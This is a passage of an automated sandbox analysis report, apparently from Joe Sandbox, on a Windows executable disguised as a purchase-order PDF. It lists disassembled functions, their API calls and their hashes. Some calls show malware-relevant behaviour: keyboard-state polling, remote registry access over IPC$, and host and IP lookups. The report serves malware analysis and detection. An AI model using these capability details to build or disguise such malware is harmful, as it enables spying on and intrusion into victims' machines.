                                                                                                                                                                                                                                                                                                            • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: Version$\TypeLib$interface\
                                                                                                                                                                                                                                                                                                            • API String ID: 656856066-939221531
                                                                                                                                                                                                                                                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                                                                                                                                                                                                            Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                            • API String ID: 3590180749-2354261254
                                                                                                                                                                                                                                                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                                                                                                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                                                                                                                                                                                                            Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00458194
                                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                            • API String ID: 2255324689-22481851
                                                                                                                                                                                                                                                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                                                                                                                                                                                                            Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ($interface$interface\
                                                                                                                                                                                                                                                                                                            • API String ID: 2231185022-3327702407
                                                                                                                                                                                                                                                                                                            • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                                                                                                                                                                                                            Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                            • API String ID: 2691793716-3771769585
                                                                                                                                                                                                                                                                                                            • Opcode ID: b6a406904d9dcfa85f829da82c9f35553919c21145383c5674c80c7426fd4d6d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6a406904d9dcfa85f829da82c9f35553919c21145383c5674c80c7426fd4d6d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                                                                                                                                                                                                            Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                                                                                                                                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00416B8A
                                                                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00416BAB
                                                                                                                                                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                            • API String ID: 1028249917-2843748187
                                                                                                                                                                                                                                                                                                            • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                                                                                                                                                                                            • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                                                                                                                                                                                                            Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1350042424-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                                                                            • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                                                                                                                                                                                            Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                            • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                                                                                                                                                                                                            Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                                                                            • String ID:
